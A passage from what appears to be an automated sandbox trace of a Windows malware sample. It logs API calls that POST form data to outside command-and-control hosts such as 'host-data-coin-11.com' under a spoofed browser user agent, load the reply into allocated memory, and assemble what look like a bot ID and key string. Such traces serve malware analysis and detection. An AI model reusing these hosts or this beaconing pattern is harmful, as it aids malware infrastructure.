(hRequest=0x71cad70, pwszHeaders="Accept: */*\r\nReferer: http://ivckvkrjmn.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0128.117] WinHttpSendRequest (hRequest=0x71cad70, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x83003a0*, dwOptionalLength=0x133, dwTotalLength=0x133, dwContext=0x0) returned 1 [0130.914] WinHttpReceiveResponse (hRequest=0x71cad70, lpReserved=0x0) returned 1 [0130.914] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2800) returned 0x7f14370 [0130.914] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f14370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f7f8 | out: lpBuffer=0x7f14370*, lpdwNumberOfBytesRead=0x7d6f7f8*=0x199) returned 1 [0130.915] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x7f14370, Size=0x5000) returned 0x7f14370 [0130.915] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x7f14509, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f7f8 | out: lpBuffer=0x7f14509*, lpdwNumberOfBytesRead=0x7d6f7f8*=0x0) returned 1 [0130.916] VirtualAlloc (lpAddress=0x0, dwSize=0x199, flAllocationType=0x3000, flProtect=0x4) returned 0x3a20000 [0130.918] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f14370) returned 1 [0130.918] WinHttpCloseHandle (hInternet=0x71cad70) returned 1 [0130.918] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300700) returned 0x10d [0130.918] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300700) returned 1 [0130.918] WinHttpCloseHandle (hInternet=0x3f83fd0) returned 1 [0130.918] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300630) returned 0x68 [0130.919] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300630) returned 1 [0130.919] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300610) returned 0x12 [0130.919] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300610) returned 1 [0130.919] WinHttpCloseHandle (hInternet=0x3fb03a0) returned 1 [0130.919] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83004f0) returned 0x10c [0130.919] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83004f0) returned 1 [0130.919] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83002a0) returned 0xed [0130.920] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83002a0) returned 1 [0130.920] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x83003a0) returned 0x13c [0130.920] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x83003a0) returned 1 [0130.920] VirtualFree (lpAddress=0x3a20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.921] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x8300080) returned 0x210 [0130.922] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x8300080) returned 1 [0130.922] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f13360) returned 0x1008 [0130.922] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f13360) returned 1 [0130.922] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12350) returned 0x1008 [0130.922] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12350) returned 1 [0130.922] VirtualFree (lpAddress=0x3970000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f766b7e [0130.924] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xd2) returned 0x8300080 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10867ad1 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3885bb6f [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7548705c [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6b7f6fd3 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7df052e3 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6813602b [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13954dd5 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x346446c8 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x384e7e8d [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x199a5ee0 [0130.924] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb19a5c8 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb1892ac [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x145fe5a6 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5467262a [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d5e944f [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73933278 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfce1db9 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7186401f [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb688985 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60a5187f [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52dc92f0 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21822c99 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd9987af [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71d0ae6a [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32115f4 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f53bc3f [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2e64aae8 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ad584dc [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x464be500 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56e970a2 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70cba28a [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ae2f2c5 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x795a99cb [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdb349d1 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fb701d2 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79e26465 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x459ae19f [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b1c228c [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10854e02 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d00a37a [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37685211 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fe89647 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c6a10f8 [0130.925] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x612590c9 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x528c51f9 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3f3d268d [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ae048a5 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1141da15 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55e1a13b [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42871504 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5bcf8691 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9685b26 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e236f49 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f5fd5b9 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15f48125 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7697eee7 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xea9e5ba [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfd63302 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x356db7a7 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33255400 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30fad078 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x251f39be [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x767e9dff [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27113c93 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x246c3ccf [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1efc6afd [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1a82d81c [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56a99716 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3dea0ab [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40c9bd68 [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb8049bd [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3845afaa [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3a58b3bd [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5bd1323a [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2007e20c [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40c7f70b [0130.926] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x363d7e9d [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4244e509 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c0c0a60 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71d00255 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c0e6f4f [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d6fdc57 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29c96eee [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x180591e8 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x704e106c [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x724e4c8a [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70dc2651 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x575806bb [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62adc486 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47ac749b [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63ac03c0 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29513375 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x579fca7e [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9413d07 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ea33caf [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2bb3b935 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11e0103d [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c0aedd8 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79ebae6c [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1050feb1 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58437fc3 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25bff34c [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46b0c58b [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x148d1fd5 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x680009da [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3dbf514 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fa67343 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7622a991 [0130.927] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x780dd8ad [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4521defb [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ef4796 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33fe88 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x354a8362 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49253b7c [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x706a96b3 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ee999a0 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ce8e683 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x663c4c51 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25b4c3f8 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41a1034a [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x33385016 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1167f503 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf06c389 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e1e3c6a [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74ceeb26 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14eb64df [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x717b27b6 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b18e3c5 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b545bdf [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2426a469 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9fa1b7d [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x425ef9a9 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x208ace49 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf02aa86 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2fad18b2 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x65c35c71 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1560285b [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6632b792 [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62ce6e4d [0130.928] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32a65468 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62f0699d [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9f1be04 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cebfb6d [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42cf285e [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x728281a9 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x964cf10 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x295601c7 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17983781 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x52e5d1a2 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74957f9 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c4c0e8b [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7f7291df [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74a670f4 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x364fbd9a [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7db4489e [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d6dbc1a [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22cccdc8 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x91b18e8 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5eaa9827 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x544e5d76 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb42f8b0 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72d2e1d1 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x571345bc [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26825c29 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61dfc042 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4eabc710 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xd7c3e4c [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x339e4900 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60b2d722 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x131f4da5 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49737707 [0130.929] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48d2c02f [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15210d85 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22a6f9f3 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x506f1771 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x73b4687 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x364398dd [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56c3c2db [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f3f4032 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31901381 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x411bc685 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x469af061 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25d52de1 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d133299 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f2f587b [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ededdbc [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdb3175e [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18fcfa54 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x25d44339 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d8d7c39 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe5d574d [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24f5a8f8 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e0b84a5 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x147cfccb [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4192e355 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x735438d2 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46b40cce [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4c99afcb [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41ce281c [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2703b661 [0130.930] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ce9523c [0130.930] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x121) returned 0x8300160 [0130.931] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0130.931] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0130.931] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0130.931] lstrcatA (in: lpString1="", lpString2="@F3@>(V_J#Y)?iJKlx:(ylhmm,GWMe](h&n<^>pk,`r:lV5u+jF\"Uv>j?3(u61" | out: lpString1="@F3@>(V_J#Y)?iJKlx:(ylhmm,GWMe](h&n<^>pk,`r:lV5u+jF\"Uv>j?3(u61") returned="@F3@>(V_J#Y)?iJKlx:(ylhmm,GWMe](h&n<^>pk,`r:lV5u+jF\"Uv>j?3(u61" [0130.931] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10c) returned 0x8300290 [0130.931] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0130.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f12300, cbMultiByte=30, lpWideCharStr=0x8300290, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0130.931] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x7d6f7b8 | out: pProxyConfig=0x7d6f7b8) returned 1 [0131.015] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb03a0 [0131.016] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x7d6f870 | out: lpUrlComponents=0x7d6f870) returned 1 [0131.016] WinHttpConnect (hSession=0x3fb03a0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83fd0 [0131.016] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x83003b0 [0131.016] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x68) returned 0x83003d0 [0131.016] WinHttpOpenRequest (hConnect=0x3f83fd0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x71cad70 [0131.016] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4e) returned 0x8300440 [0131.016] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x83004a0 [0131.016] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56ca7a32 [0131.016] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 